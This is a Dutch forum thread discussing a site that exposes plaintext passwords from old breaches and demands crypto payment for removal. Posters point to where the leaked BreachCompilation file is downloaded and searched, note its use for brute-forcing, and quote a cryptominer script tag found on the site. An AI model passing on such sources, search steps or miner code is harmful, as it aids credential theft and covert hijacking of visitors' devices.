NWS Nieuws & Achtergronden
Discussieer hier diepgaander over de actualiteiten.
Via RTL:
https://www.rtlnieuws.nl/(...)ljoenen-nederlanders
https://www.rtlnieuws.nl/(...)ljoenen-nederlanders
Zeg het maar, wat is de url?quote:Een nieuwe zoekmachine toont de volledige wachtwoorden van meer dan 1,4 miljard e-mailadressen. Daar zitten ook miljoenen wachtwoorden van Nederlanders bij. Het is ook mogelijk om wachtwoorden van andere mensen op te zoeken.
RTL Nieuws ontdekte de zoekmachine na een tip. Om ethische redenen noemen wij de naam van de zoekmachine niet. De website vind je op het normale internet, en niet op het dark web.
Bij Gotcha, een wachtwoordzoekmachine die vorige week in het nieuws kwam, werden alleen de eerste twee letters van een wachtwoord getoond. Deze gaat dus een stap verder.
Datalekken
De website is pas sinds kort online en laat je een e-mailadres invoeren. Daarna toont de website alle bekende gehackte wachtwoorden die zijn gekoppeld aan het e-mailadres.
De data zijn afkomstig uit tientallen grote datalekken van de afgelopen jaren, onder meer van LinkedIn, Dropbox, Playstation en eBay. Ondanks dat sommige wachtwoorden vrij oud zijn, gaat het wel om wachtwoorden die echt zijn gebruikt en soms nog steeds gebruikt worden, zo blijkt uit verschillende testen.
Geld aftroggelen
De beheerder van de website vraagt minstens 10 dollar aan bitcoin, ethereum of litecoin om je wachtwoorden van de website te verwijderen. Op die manier probeert hij geld af te troggelen van mensen.
In de lijst met gehackte wachtwoorden zijn ook (voormalige) wachtwoorden van Tweede Kamerleden, het ministerie van Defensie en de Belastingdienst te vinden.
Deze geheimzinnigheid 
Wij weten iets en wij maken er een nieuwsberichtje over voor de klicks, maar we zeggen lekker niet wat de link is PUH PUH.
Wij weten iets en wij maken er een nieuwsberichtje over voor de klicks, maar we zeggen lekker niet wat de link is PUH PUH.
U MAD?
https://gotcha.pw/ volgens mij.
Als het niet met een hamer te repareren is, is het een elektrisch probleem.
Dat is die bekende. Die toont geen hele wachtwoordenquote:
Crack the following and we will get back to you: !1!llssod000;;
Ja mensen, controleer snel of je wachtwoord ertussen staat! Vul bijvoorbeeld vooral je persoonlijke e-mail in, en zoek daarna ook even de username van je internetbankieren, FOK!, of weet ik veel wat in! Ze zullen heus niet bijhouden welke verschillende usernames en wachtwoorden jij checkt, om zo accounts aan elkaar te koppelen en je nog vatbaarder te maken!
Ik zeg doen!
Ik zeg doen!
Ik vecht met zwervers voor mijn plezier. Binnenkort ook op YouTube!
Kinda dit inderdaad.quote:Op donderdag 12 april 2018 13:34 schreef Klaploper het volgende:
Ja mensen, controleer snel of je wachtwoord ertussen staat! Vul bijvoorbeeld vooral je persoonlijke e-mail in, en zoek daarna ook even de username van je internetbankieren, FOK!, of weet ik veel wat in! Ze zullen heus niet bijhouden welke verschillende usernames en wachtwoorden jij checkt, om zo accounts aan elkaar te koppelen en je nog vatbaarder te maken!
Ik zeg doen!
Jij gaat je gegevens invullen.. tada! ze hebben je gegevens lol.
Edit : Als ik alleen op email zoek, minder schadelijk hehe, word er in ieder geval niets gevonden op 1 oud mail adres na, zo te zien nog het wachtwoord van WoW van letterlijk meer dan 10 jaar geleden.
de bestanden met usernames en passwords staan gewoon voor een ieder te downloaden op torrentsites zoals bv de piratebay...
Waarom zou je er in godsnaam voor betalen?
Waarom zou je er in godsnaam voor betalen?
Stel dat jij ook op je tweede e-mailadres, of een andere username zoekt. Koppeling is gemaakt.quote:Op donderdag 12 april 2018 13:36 schreef TheoddDutchGuy het volgende:
[..]
Kinda dit inderdaad.
Jij gaat je gegevens invullen.. tada! ze hebben je gegevens lol.
Edit : Als ik alleen op email zoek, minder schadelijk hehe, word er in ieder geval niets gevonden op 1 oud mail adres na, zo te zien nog het wachtwoord van WoW van letterlijk meer dan 10 jaar geleden.
Weet jij veel of ze misschien ook een nieuwer wachtwoord je weten, maar niet tonen? Of dat die later nog een keer lekt.
Dan heb je ze lekker geholpen al je accounts en wachtwoorden aan elkaar te koppelen.
Ik vecht met zwervers voor mijn plezier. Binnenkort ook op YouTube!
Je eigen wachtwoorden controlleer je gewoon op haveibeenpowned.quote:
[..]
Stel dat jij ook op je tweede e-mailadres, of een andere username zoekt. Koppeling is gemaakt.
Weet jij veel of ze misschien ook een nieuwer wachtwoord je weten, maar niet tonen? Of dat die later nog een keer lekt.
Dan heb je ze lekker geholpen al je accounts en wachtwoorden aan elkaar te koppelen.
Met deze website doe je andere dingen.
Crack the following and we will get back to you: !1!llssod000;;
Kan alleen geopend worden met zo'n aparte browser toch?quote:
Hier staat een link, echter is dit naar deepweb
https://raidforums.com/Th(...)il-password-DATABASE
Daar geldt precies hetzelfde voor. Jij vult je e-mailadres in op haveibeenpowned, ziet een verouderd wachtwoord dus denkt dat je veilig zit. Vervolgens zoek je ook nog even je username op van je mobiele provider, FOK!, zorgverzekeraar of wat dan ook.quote:
[..]
Je eigen wachtwoorden controlleer je gewoon op haveibeenpowned.
Met deze website doe je andere dingen.
Je gegevens zijn nu gekoppeld, en jij hebt geen idee of ze misschien ook nieuwere wachtwoorden o.i.d. hebben, of dat die later nog lekken.
Ik vecht met zwervers voor mijn plezier. Binnenkort ook op YouTube!
ik zou serieus uitkijken met het invoeren van je email adres in dit soort zoekengines
je cookies kunnen misschien uitgelezen worden waarmee je wachtwoorden automatisch worden aangevuld op websites..
ik ga echt niet mijn mailadres invoeren
je cookies kunnen misschien uitgelezen worden waarmee je wachtwoorden automatisch worden aangevuld op websites..
ik ga echt niet mijn mailadres invoeren
Als je de wereld wilt begrijpen, moet je denken zoals ik.
(Onnoman)
si vi pacem para bellum
himmelhoch jauchzend
(Onnoman)
si vi pacem para bellum
himmelhoch jauchzend
Pff. Hou eens op.quote:
ik zou serieus uitkijken met het invoeren van je email adres in dit soort zoekengines
je cookies kunnen misschien uitgelezen worden waarmee je wachtwoorden automatisch worden aangevuld op websites..
ik ga echt niet mijn mailadres invoeren
<knip voor naam>
Misschien handig of ze even alle @fok.nl accounts even het wachtwoord resetten (Y)
Misschien handig of ze even alle @fok.nl accounts even het wachtwoord resetten (Y)
Rotsje&Koekje
Stil nou.quote:
[ afbeelding ]
Misschien handig of ze even alle @fok.nl accounts even het wachtwoord resetten (Y)
Agh heb al aantal keer gezegd dat ik op een account zit vanuit die leak maar niemand reageert.quote:
Rotsje&Koekje
BreachCompilation van 40GB zit ook een mooie search tool bij.quote:Op donderdag 12 april 2018 14:19 schreef NoXia het volgende:
Gewoon even zoeken op breachcompilation.txt (4GB) en zelf even kijken hoe en wat
./search.sh username
Rotsje&Koekje
Weg gehaaldquote:
[..]
Ook leuk dat je iedereen zijn naam even online zet.
[ Bericht 12% gewijzigd door Feejx op 12-04-2018 14:27:37 ]
Rotsje&Koekje
Okay website werkt niet meer door hebberige fokkers.
Crack the following and we will get back to you: !1!llssod000;;
Dat is toch van github? BreachAnalysis?quote:
Werkt dat ook op windows?
Crack the following and we will get back to you: !1!llssod000;;
Ik heb via Docker een linux machine gelaunched in powershell.quote:
[..]
Dat is toch van github? BreachAnalysis?
Werkt dat ook op windows?
Rotsje&Koekje
Does OS van linux is niet nodig?quote:
[..]
Ik heb via Docker een linux machine gelaunched in powershell.
Link naar dat docker gedoe.
Crack the following and we will get back to you: !1!llssod000;;
Jawel maar je runt een container van linux op je windows machine.quote:
[..]
Does OS van linux is niet nodig?
Link naar dat docker gedoe.
https://www.docker.com/
dan een image pull doen van ubuntu of alpine.
via powershell:
docker run --rm -v windowslocatievanbestanden:/tmp/breach -ti ubuntu
Rotsje&Koekje
Natuurlijk kan dat niet.quote:
ik zou serieus uitkijken met het invoeren van je email adres in dit soort zoekengines
je cookies kunnen misschien uitgelezen worden waarmee je wachtwoorden automatisch worden aangevuld op websites..
ik ga echt niet mijn mailadres invoeren
🕰️₿🕰️₿🕰️₿🕰️₿🕰️₿🕰️ TikTok next Block
Thnxquote:
[..]
Jawel maar je runt een container van linux op je windows machine.
https://www.docker.com/
dan een image pull doen van ubuntu of alpine.
via powershell:
docker run --rm -v windowslocatievanbestanden:/tmp/breach -ti ubuntu
Crack the following and we will get back to you: !1!llssod000;;
Maakt niet uit, alle accounts die ik bezit, zitten achter of zijn gekoppeld aan bijv. een authenticator of andere vorm van 2-step.quote:
[..]
Stel dat jij ook op je tweede e-mailadres, of een andere username zoekt. Koppeling is gemaakt.
Weet jij veel of ze misschien ook een nieuwer wachtwoord je weten, maar niet tonen? Of dat die later nog een keer lekt.
Dan heb je ze lekker geholpen al je accounts en wachtwoorden aan elkaar te koppelen.
Sowieso zou dat meer gepromote moeten worden, want dan hebben ze in vrijwel alle instanties niets aan alleen een wachtwoord.
Heb hier even geen tor browser ter beschikking.quote:
[..]
Serieus? Check even wat posts terug.
Kan gewoon met een normale browser.quote:
[..]
Heb hier even geen tor browser ter beschikking.
Rotsje&Koekje
http://breachedpasswords.website werkt nietquote:
[..]
Serieus? Check even wat posts terug.
Overbelastquote:
[..]
http://breachedpasswords.website werkt niet
🕰️₿🕰️₿🕰️₿🕰️₿🕰️₿🕰️ TikTok next Block
Jij bent ook niet de doorsnee internetgebruiker. Genoeg mensen die even al hun accounts checken, zien dat er maar één account van ze is gevonden met een verouderd wachtwoord, en dan denken dat zij veilig zijn. Niet wetende dat de kans dik aanwezig is dat er nu iemand is die al hun usernames aan elkaar gekoppeld heeft en daar vervelende dingen mee kan doen.quote:
[..]
Maakt niet uit, alle accounts die ik bezit, zitten achter of zijn gekoppeld aan bijv. een authenticator of andere vorm van 2-step.
Sowieso zou dat meer gepromote moeten worden, want dan hebben ze in vrijwel alle instanties niets aan alleen een wachtwoord.
Ik vecht met zwervers voor mijn plezier. Binnenkort ook op YouTube!
of een stom grapje waardoor ik al minuten lang naar een ronddraaiend dingetje aan het kijken ben.quote:
Nee ding doet een ajax call op:quote:
[..]
of een stom grapje waardoor ik al minuten lang naar een ronddraaiend dingetje aan het kijken ben.
https://leak.breachedpass(...)l=raptorix@gmail.com
Deze laad ook al tijdje, heb overigens de bestanden zelf gedownload, had alleen nog geen tijd gehad om ze goed te indexeren of the importeren in een database omdat mijn server maar beperkt geheugen heeft.
🕰️₿🕰️₿🕰️₿🕰️₿🕰️₿🕰️ TikTok next Block
Duurt wel heel erg lang danquote:
[..]
Nee ding doet een ajax call op:
https://leak.breachedpass(...)l=raptorix@gmail.com
Deze laad ook al tijdje, heb overigens de bestanden zelf gedownload, had alleen nog geen tijd gehad om ze goed te indexeren of the importeren in een database omdat mijn server maar beperkt geheugen heeft.
Beter zorgen ze dat de website niet zo snel overbelast raakt.quote:
[..]
Site is op dit moment overbelast. De rest kan je zelf wel invullen denk ik.
omg.quote:
[..]
Beter zorgen ze dat de website niet zo snel overbelast raakt.
Anders doneer je even poeplapquote:
[..]
Wat heb je nou aan een website die overbelast is?
🕰️₿🕰️₿🕰️₿🕰️₿🕰️₿🕰️ TikTok next Block
zijn oude lijsten uit het jaar kruik die ze door een databasje jagen
Als je de wereld wilt begrijpen, moet je denken zoals ik.
(Onnoman)
si vi pacem para bellum
himmelhoch jauchzend
(Onnoman)
si vi pacem para bellum
himmelhoch jauchzend
Ik heb even mark zuckerberg gebeld, die wil dit in Facebook gaan gebruiken.
Mag ik je vandaag weer eens irriteren?
Waarom, Zuck heeft je passwords toch alquote:
Ik heb even mark zuckerberg gebeld, die wil dit in Facebook gaan gebruiken.
"The enemy isn't men, or women, it's bloody stupid people and no one has the right to be stupid." - Sir Terry Pratchett.
quote:Checking 1.4 billion entries...
It's a bit crowded... It seems that we've reached the news!
Please share to raise awareness. Too bad it takes a while now.
We're upscaling
Crack the following and we will get back to you: !1!llssod000;;
en dan verdwijnt je username/password dus niet uit dat bestand van 48 GB. enkel van 1 website.quote:
[..]
Je betaalt niet voor het zoeken lul. Je betaalt voor het verwijderen. En die bestand is 48gb. Daar heb ik niet echt zin in.
dus waarom zou je daar voor betalen?
ik heb overigens niet met je op school gezeten, dus kies even een normale aanspreektitel.
Nou en? Er zullen veel meer mensen zijn die de website gaan gebruiken omdat er mensen bestaan die geen verstand hebben van een powershell.quote:
[..]
en dan verdwijnt je username/password dus niet uit dat bestand van 48 GB. enkel van 1 website.
dus waarom zou je daar voor betalen?
ik heb overigens niet met je op school gezeten, dus kies even een normale aanspreektitel.
Crack the following and we will get back to you: !1!llssod000;;
Blijkbaar ben je van de frontpage hier, en dus onderdeel van de fok crew. met degelijke aanspreektitels haal je fok dus lekker door het slijk. maar goed, moet je zelf weten.quote:
[..]
Nou en? Er zullen veel meer mensen zijn die de website gaan gebruiken omdat er mensen bestaan die geen verstand hebben van een powershell.
ik heb het bestand overigens wel gedownload, en de zoekscripts zitten er bij, samen met een (duidelijke) handleiding..... er is wel degelijk moeite in gestoken om het erg gebruiksvriendelijk te maken. je hebt erg weinig it kennis nodig om het te kunnen gebruiken.
als jij betaald om het van de website af te halen, is het voor iemand ook meteen duidelijk dat het wachtwoord nog ergens in gebruik is.
Dat jij je op je pik getrapt voelt hoef je niet zo vaak te melden. FOK! is geen formele forum, dus als je niet tegen milde woordjes als "lul" kunt zou je snel moeten uitloggen.quote:
[..]
Blijkbaar ben je van de frontpage hier, en dus onderdeel van de fok crew. met degelijke aanspreektitels haal je fok dus lekker door het slijk. maar goed, moet je zelf weten.
ik heb het bestand overigens wel gedownload, en de zoekscripts zitten er bij, samen met een (duidelijke) handleiding..... er is wel degelijk moeite in gestoken om het erg gebruiksvriendelijk te maken. je hebt erg weinig it kennis nodig om het te kunnen gebruiken.
als jij betaald om het van de website af te halen, is het voor iemand ook meteen duidelijk dat het wachtwoord nog ergens in gebruik is.
En wat je hier beschrijft neemt nog niet weg dat er veel meer mensen de website zullen gebruiken dan de powershell methode. En misschien is dat betalen niet voor het wachtwoord, maar voor je email.
Crack the following and we will get back to you: !1!llssod000;;
Ik wou het even zeker weten..quote:
[..]
Waarom, Zuck heeft je passwords toch al
Mag ik je vandaag weer eens irriteren?
klopt. maar morgen is er een nieuwe website, waar je wachtwoord wel weer op staat. betaal je daar dan ook voor? en overmorgen weer een nieuwe.... zolang mensen daarvoor betalen, zullen dit soort websites de kop op blijven steken...quote:
[..]
Dat jij je op je pik getrapt voelt hoef je niet zo vaak te melden. FOK! is geen formele forum, dus als je niet tegen milde woordjes als "lul" kunt zou je snel moeten uitloggen.
En wat je hier beschrijft neemt nog niet weg dat er veel meer mensen de website zullen gebruiken dan de powershell methode. En misschien is dat betalen niet voor het wachtwoord, maar voor je email.
daarom: waarom zou je hiervoor betalen? je geeft er alleen maar mee aan dat het nog ergens gebruikt....
en maak je geen zorgen, ik ben niet op mijn pik getrapt hoor.
wel vind ik je een enorme internetheld. of spreek je mensen op straat ook aan met "lul"?
In clear text? Want bij de andere websites zie ik alleen de eerste twee letters maar dat zegt niets.quote:
de bestanden met usernames en passwords staan gewoon voor een ieder te downloaden op torrentsites zoals bv de piratebay...
Waarom zou je er in godsnaam voor betalen?
1/10 Van de rappers dankt zijn bestaan in Amerika aan de Nederlanders die zijn voorouders met een cruiseschip uit hun hongerige landen ophaalde om te werken op prachtige plantages.
"Oorlog is de overtreffende trap van concurrentie."
"Oorlog is de overtreffende trap van concurrentie."
Ja.quote:
[..]
In clear text? Want bij de andere websites zie ik alleen de eerste twee letters maar dat zegt niets.
Thuis maar eens downloaden.quote:
Deze toch he: breachcompilation.txt
1/10 Van de rappers dankt zijn bestaan in Amerika aan de Nederlanders die zijn voorouders met een cruiseschip uit hun hongerige landen ophaalde om te werken op prachtige plantages.
"Oorlog is de overtreffende trap van concurrentie."
"Oorlog is de overtreffende trap van concurrentie."
Klopt.quote:
[..]
Thuis maar eens downloaden.
Deze toch he: breachcompilation.txt
breachcompilationuniq.txt is de gesorteerde versie zonder dubbele.
Leuke cryptominerquote:
<script data-rocketsrc="//cryptaloot.pro/lib/crypta.js" type="text/rocketscript"></script>
quote:
[..]
Leuke cryptominer
<script data-rocketsrc="//cryptaloot.pro/lib/crypta.js" type="text/rocketscript"></script>
Crack the following and we will get back to you: !1!llssod000;;
Ik dacht al waarom schreeuwt mijn computer zo
Crack the following and we will get back to you: !1!llssod000;;
Was inderdaad al vermeld.quote:
[..]
Leuke cryptominer
<script data-rocketsrc="//cryptaloot.pro/lib/crypta.js" type="text/rocketscript"></script>
Klopt, maar zijn alleen wachtwoorden, niet de usernames.quote:
[..]
Klopt.
breachcompilationuniq.txt is de gesorteerde versie zonder dubbele.
🕰️₿🕰️₿🕰️₿🕰️₿🕰️₿🕰️ TikTok next Block
Die worden toch gebruikt voor bruteforce?quote:
[..]
Klopt, maar zijn alleen wachtwoorden, niet de usernames.
Crack the following and we will get back to you: !1!llssod000;;
Dat zou kunnen.quote:
[..]
Die worden toch gebruikt voor bruteforce?
🕰️₿🕰️₿🕰️₿🕰️₿🕰️₿🕰️ TikTok next Block
Net even gechecked, deze website gebruikt idd de database die al bekend was, had de files met combinatie van username/pw al gedownload en vond daar zelfde zaken in. Over het algemeen vermoed ik dat kwaadwillenden hier niet zoveel mee kunnen.quote:
[..]
Die worden toch gebruikt voor bruteforce?
🕰️₿🕰️₿🕰️₿🕰️₿🕰️₿🕰️ TikTok next Block
Haha, gecheckt, was breached met een pw van minimaal 3 jaar oud ofzo.
Ah cryptominer, vandaar dat mn smartfeun t druk had.
Ah cryptominer, vandaar dat mn smartfeun t druk had.
M'n schoenen zijn gejat, maar ik hoef niet meer naar buiten, want er is nog wel wat.
Waar open ik die shit mee? Want de standaard textverwerkers gaan hier kapot op. Of heeft iemand een link naar het deepweb welke niet achter een spoilertag zitten.quote:
[..]
Klopt.
breachcompilationuniq.txt is de gesorteerde versie zonder dubbele.
1/10 Van de rappers dankt zijn bestaan in Amerika aan de Nederlanders die zijn voorouders met een cruiseschip uit hun hongerige landen ophaalde om te werken op prachtige plantages.
"Oorlog is de overtreffende trap van concurrentie."
"Oorlog is de overtreffende trap van concurrentie."
Het was even een zoektocht, maar dat gaat met large text file viewer: https://www.portablefreeware.com/index.php?id=693quote:
[..]
Waar open ik die shit mee? Want de standaard textverwerkers gaan hier kapot op. Of heeft iemand een link naar het deepweb welke niet achter een spoilertag zitten.
Ik had een log viewer geprobeerd maar die klapte eruit toen mijn 16 gig aan ram volzat.quote:
[..]
Het was even een zoektocht, maar dat gaat met large text file viewer: https://www.portablefreeware.com/index.php?id=693
1/10 Van de rappers dankt zijn bestaan in Amerika aan de Nederlanders die zijn voorouders met een cruiseschip uit hun hongerige landen ophaalde om te werken op prachtige plantages.
"Oorlog is de overtreffende trap van concurrentie."
"Oorlog is de overtreffende trap van concurrentie."
Even tussendoor: Is bijvoorbeeld een website als lastpass echt veilig om te gebruiken?
Wat is een echt aan te raden wachtwoord manager die bijvoorbeeld ook zelf moeilijke wachtwoorden genereert?
Wat is een echt aan te raden wachtwoord manager die bijvoorbeeld ook zelf moeilijke wachtwoorden genereert?
Keepass is een prima manager die dat ook kan.quote:
Even tussendoor: Is bijvoorbeeld een website als lastpass echt veilig om te gebruiken?
Wat is een echt aan te raden wachtwoord manager die bijvoorbeeld ook zelf moeilijke wachtwoorden genereert?
|
|
